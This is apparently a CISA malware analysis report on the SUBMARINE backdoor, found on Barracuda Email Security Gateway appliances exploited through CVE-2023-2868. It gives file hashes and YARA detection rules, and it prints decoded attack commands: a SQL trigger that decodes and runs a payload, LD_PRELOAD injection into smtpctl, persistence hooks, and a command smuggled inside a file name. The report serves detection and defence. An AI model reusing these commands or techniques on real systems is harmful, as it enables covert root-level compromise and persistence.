Analysis Reports

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA obtained seven malware samples related to a novel backdoor CISA has named SUBMARINE. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting certain versions 5.1.3.001 - 9.2.0.006 of Barracuda Email Security Gateway (ESG).

SUBMARINE is a novel persistent backdoor that lives in a Structured Query Language (SQL) database on the ESG appliance. SUBMARINE comprises multiple artifacts that, in a multi-step process, enable execution with root privileges, persistence, command and control, and cleanup. In addition to SUBMARINE, CISA obtained associated Multipurpose Internet Mail Extensions (MIME) attachment files from the victim. These files contained the contents of the compromised SQL database, which included sensitive information.

For information about related malware, specifically information on the initial exploit payload and other backdoors, see CISA Alert: CISA Releases Malware Analysis Reports on Barracuda Backdoors.

Download the PDF version of this report:

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

Submitted Files (5)

6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0 (r)

81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab (libutil.so)

8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239 (machineecho_-n_Y2htb2QgK3ggL3J...)

b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43 (sedO4CWZ9)

cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a (smtpctl)

Additional Files (2)

2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5 (config.TRG)

bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a (run.sh)

Findings

2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5

Details

-->

Antivirus

No matches found.

YARA Rules

• rule CISA_10454006_06 : SUBMARINE trojan backdoor cleans_traces_of_infection hides_artifacts installs_other_components
  {
     meta:
         Author = "CISA Code & Media Analysis"
         Incident = "10454006"
         Date = "2023-07-11"
         Last_Modified = "20230727_1200"
         Actor = "n/a"
         Family = "SUBMARINE"
         Capabilities = "cleans-traces-of-infection hides-artifacts installs-other-components"
         Malware_Type = "trojan backdoor"
         Tool_Type = "unknown"
         Description = "Detects SUBMARINE SQL trigger samples"
         SHA256_1 = "2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5"
     strings:
         $s1 = { 54 52 49 47 47 45 52 }
         $s2 = { 43 52 45 41 54 45 }
         $s3 = { 53 45 4c 45 43 54 20 22 65 63 68 6f 20 2d 6e }
         $s4 = { 62 61 73 65 36 34 20 2d 64 20 7c 20 73 68 }
         $s5 = { 72 6f 6f 74 }
         $s6 = { 53 45 54 }
         $s7 = { 45 4e 44 20 49 46 3b }
         $s8 = { 48 34 73 49 41 41 41 41 41 41 41 41 41 2b 30 61 43 33 42 55 }
         $s9 = { 2f 76 61 72 2f 74 6d 70 2f 72 }
         $s10 = { 2f 72 6f 6f 74 2f 6d 61 63 68 69 6e 65 }
     condition:
     filesize }

ssdeep Matches

No matches found.

Description

The file 'config.TRG' is a SUBMARINE artifact. The presence of the filename, 'config.TRG' does not indicate that the ESG is infected. Instead, it is the actual contents of the file that determine whether it is infected or not. The contents of 'config.TRG' is contained within the SQL database file called 'config.snapshot' and the MIME attachments. Presence of the contents of the file 'config.TRG' within the SQL database is indicative of an infection of SUBMARINE.

The file contains a malicious SQL trigger called ‘cuda_trigger’ (Figure 1). This SQL trigger is set to run as root on the local host before a row is deleted from the database. After the trigger parameters are met, two actions occur. First a compressed, base64 encoded blob containing 2 files is written into a file called ‘r’ in the ‘/var/tmp’ directory (Figure 2). Second, a base64 encoded command is executed (Figure 3).

--Begin Base64 Decoded Command--
cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp
nohup bash /var/tmp/run.sh >/dev/null 2>&1 &
rm -f /root/machine` *chmod +x /root/mac*
sh /root/mach*`*
--End Base64 Decoded Command--

The commands will decode the base64 encoded string and execute the decoded result as a shell command. The commands will pass the contents of the file 'r' to be decoded then decompressed with the 'tar' command. Then, the file 'run.sh' executes with the 'nohup' parameter. The 'nohup' parameter allows the process launched on the shell to continue executing even if the shell is closed. The 'BSMTP_ID' is passed and all errors redirected and discarded to the '/dev/null' directory. Lastly, the contents of the '/root/machine' directory will be removed, permissions are set to executable, and shell scripts containing a name with the string 'mach*' in the root directory are executed.

Screenshots

Figure 1. - The malicious SQL trigger called 'cuda_trigger'.

Figure 2. - A small snippet of the base64 blob being written into the file 'r'.

Figure 3. - A small snippet of the base64 encoded command found after 'r' is written.

8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239

Details

-->

Antivirus

No matches found.

YARA Rules

• rule CISA_10454006_07 : SUBMARINE trojan dropper exploit_kit evades_av hides_executing_code hides_artifacts exploitation
  {
     meta:
         Author = "CISA Code & Media Analysis"
         Incident = "10454006"
         Date = "2023-07-11"
         Last_Modified = "20230711_1830"
         Actor = "n/a"
         Family = "SUBMARINE"
         Capabilities = "evades-av hides-executing-code hides-artifacts"
         Malware_Type = "trojan dropper exploit-kit"
         Tool_Type = "exploitation"
         Description = "Detects ESG FileName exploit samples"
         SHA256 = "8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239"
     strings:
         $s1 = { 7c 20 62 61 73 65 36 34 20 2d 64 20 7c 20 73 68 }
         $s2 = { 65 63 68 6f 20 2d 6e }
         $s3 = { 59 32 46 30 49 43 39 32 59 58 49 76 64 47 31 77 4c 33 49 67 66 43 42 69 59 58 4e 6c 4e 6a 51 67 4c 57 51 67 4c 57 6b 67 66 43 42 30 59 58 49 67 }
     condition:
         filesize }

ssdeep Matches

No matches found.

Description

The file 'machineecho -n Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK _ base64 -d _sh`_' is a SUBMARINE artifact. The file is a shell script identified in the '/root' directory and contains base64 encoded commands. The name of the file is designed to exploit a vulnerability on the target environment where the base64 string within the file name will be executed on the Linux shell.

--Begin Base64 Decoded Name/Command--
chmod +x /root/mac*
sh /root/mach*`*
--End Base64 Decoded Name/Command--

The above commands will change the permissions of the directory, '/root/mac*', to executable.

The file contains a series of operations, such as decoding a base64 encoded string and executing the decoded result as a shell command. The decoded base64 string represents a series of commands that will be executed by the shell.

~Begin Base64 Decoded Command~

cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp
nohup bash /var/tmp/run.sh    >/dev/null 2>&1 &
rm -f /root/machine`*

~End Base64 Decoded Command~

This command is identical to the decoded base64 commands found in the SQL trigger identified in the file 'config.snapshot'.

6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0

Details

-->

Antivirus

No matches found.

YARA Rules

• rule CISA_10454006_02 : SUBMARINE trojan backdoor exploitation hides_artifacts prevents_artifact_access
  {
     meta:
         Author = "CISA Code & Media Analysis"
         Incident = "10454006"
         Date = "2023-06-29"
         Last_Modified = "20230711_1500"
         Actor = "n/a"
         Family = "SUBMARINE"
         Capabilities = "hides-artifacts prevents-artifact-access"
         Malware_Type = "trojan backdoor"
         Tool_Type = "exploitation"
         Description = "Detects encoded GZIP archive samples"
         SHA256_1 = "6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0"
     strings:
         $s1 = { 48 34 73 49 41 41 41 41 41 41 41 41 41 2b 30 61 }
         $s2 = { 44 44 44 41 67 50 39 2f 2b 43 38 47 70 2f 36 63 41 46 41 41 41 41 3d 3d 0a}
         $s3 = { 37 56 4d 70 56 58 4f 37 2b 6d 4c 39 78 2b 50 59 }
     condition:
         filesize 5.8)
  }

ssdeep Matches

No matches found.

Relationships

Description

The file 'r' is a SUBMARINE artifact. The file is a Base64 encoded GNU Zip (GZIP) archive. When the 'cat /*/*/r | base64 -d -i | tar -zx -C /*/*' Linux Shell command is applied to 'r', it decompresses two files. The aforementioned Linux Shell command is contained in 'config.snapshot' as a Base64 encoded SQL trigger.

--Begin Decompressed Files--
1. run.sh (bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a)
2. libutil.so (81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab)
--End Decompressed Files--

bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a

Details

-->

Antivirus

No matches found.

YARA Rules

• rule CISA_10454006_03 : SUBMARINE trojan backdoor loader rootkit virus controls_local_machine hides_artifacts infects_files installs_other_components remote_access exploitation information_gathering
  {
     meta:
         Author = "CISA Code & Media Analysis"
         Incident = "10454006"
         Date = "2023-07-03"
         Last_Modified = "20230711_1500"
         Actor = "n/a"
         Family = "SUBMARINE"
         Capabilities = "controls-local-machine hides-artifacts infects-files installs-other-components"
         Malware_Type = "trojan backdoor loader rootkit virus"
         Tool_Type = "remote-access exploitation information-gathering"
         Description = "Detects SUBMARINE launcher script samples"
         SHA256_1 = "bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a"
     strings:
         $s1 = { 73 65 64 20 2d 69 }
         $s2 = { 4c 44 5f 50 52 45 4c 4f 41 44 3d }
         $s3 = { 6c 69 62 75 74 69 6c 2e 73 6f }
         $s4 = { 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c }
         $s5 = { 2f 62 6f 6f 74 2f 6f 73 5f 74 6f 6f 6c 73 }
         $s6 = { 72 6d 20 2d 72 66 }
         $s7 = { 62 61 73 65 36 34 20 2d 64 }
         $s8 = { 7c 73 68 }
         $s9 = { 72 65 73 74 61 72 74 }
         $s10 = { 2f 64 65 76 2f 6e 75 6c 6c }
         $s11 = { 23 21 20 2f 62 69 6e 2f 73 68 }
         $s12 = { 62 61 73 65 36 34 }
     condition:
         filesize }
• rule CISA_10454006_04 : SUBMARINE trojan backdoor hides_artifacts hides_executing_code infects_files installs_other_components remote_access exploitation
  {
     meta:
         Author = "CISA Code & Media Analysis"
         Incident = "10454006"
         Date = "2023-07-05"
         Last_Modified = "20230711_1500"
         Actor = "n/a"
         Family = "SUBMARINE"
         Capabilities = "hides-artifacts hides-executing-code infects-files installs-other-components"
         Malware_Type = "trojan backdoor"
         Tool_Type = "remote-access exploitation"
         Description = "Detects SUBMARINE launcher script samples"
         SHA256_1 = "b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43"
     strings:
         $s1 = { 73 6c 65 65 70 }
         $s2 = { 7c 62 61 73 65 36 34 20 2d 64 }
         $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 }
         $s4 = { 2f 68 6f 6d 65 2f 70 72 6f 64 75 63 74 2f 63 6f 64 65 2f 66 69 72 6d 77 61 72 65 2f 63 75 72 72 65 6e 74 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c 20 72 65 73 74 61 72 74 }
         $s5 = { 65 63 68 6f 20 2d 6e 20 27 }
         $s6 = { 73 68 }
         $s7 = { 23 21 20 2f 62 69 6e 2f 73 68 }
     condition:
         filesize }

ssdeep Matches

No matches found.

Relationships

Description

The file 'run.sh' is a SUBMARINE loader. The file is a shell script located at within the archive 'r' in the '/var/tmp' directory. The purpose of 'run.sh' is to perform a combination of file manipulation, script generation and execution (Figure 4). There are 4 variables within 'run.sh':

--Begin Variable List--

B1=$1
F="/boot/os_tools/hw-set"
S="/home/product/code/firmware/current/sbin/smtpctl"
A="/boot/os_tools/libutil.so"
B=`echo -n "sed -i "s|exec|BSMTP_ID=$B1 LD_PRELOAD=$A exec|g" $S"|base64 -w0`

--End Variable List--

The script begins by moving SUBMARINE from the '/var/tmp/' directory to the '/boot/os_tools/' directory for persistence.

The variable "B" is declared as a 'sed' command that replaces all occurrences of the string 'exec' with `BSMTP_ID=$1 LD_PRELOAD=/boot/os_tools/libutil.so exec /home/product/code/firmware/current/sbin/smtpctl'. This 'sed' command is then base64 encoded.

A new file called 'hw-set' is created in the '/boot/os_tools/' directory. A line is appended to the 'smtpctl' file which checks for the string 'LD_PRELOAD'. If the string is not found, the base64 encoded string stored in variable "B" is decoded and executed as a shell command and 'smtpctl' is restarted.

The 'chmod' command is used to set executable permissions for 'hw-set'.

The 'sed' command is used with a '-i' flag to modify the file 'update_version' within the '/boot/os_tools/' directory with an appended string to line 44. The appended string, "system('/boot/os_tools/hw-set 2>&1 >/dev/null &');", will run the file 'hw-set' in the background and redirect both output and errors to 'dev/null' whenever the file 'update_version' is executed.

The file 'hw-set' is executed and the 'sed' command with the '-i' flag is used to insert the string 'sleep 2m' on line 1 to set a sleep duration of 2 minutes.

Finally, all files and directories within '/var/tmp/' directory are removed.

Screenshots

Figure 4. - The contents of the file, 'run.sh.'

b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43

Details

-->

Antivirus

No matches found.

YARA Rules

• rule CISA_10454006_04 : SUBMARINE trojan backdoor hides_artifacts hides_executing_code infects_files installs_other_components remote_access exploitation
  {
     meta:
         Author = "CISA Code & Media Analysis"
         Incident = "10454006"
         Date = "2023-07-05"
         Last_Modified = "20230711_1500"
         Actor = "n/a"
         Family = "SUBMARINE"
         Capabilities = "hides-artifacts hides-executing-code infects-files installs-other-components"
         Malware_Type = "trojan backdoor"
         Tool_Type = "remote-access exploitation"
         Description = "Detects SUBMARINE launcher script samples"
         SHA256_1 = "b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43"
     strings:
         $s1 = { 73 6c 65 65 70 }
         $s2 = { 7c 62 61 73 65 36 34 20 2d 64 }
         $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 }
         $s4 = { 2f 68 6f 6d 65 2f 70 72 6f 64 75 63 74 2f 63 6f 64 65 2f 66 69 72 6d 77 61 72 65 2f 63 75 72 72 65 6e 74 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c 20 72 65 73 74 61 72 74 }
         $s5 = { 65 63 68 6f 20 2d 6e 20 27 }
         $s6 = { 73 68 }
         $s7 = { 23 21 20 2f 62 69 6e 2f 73 68 }
     condition:
         filesize }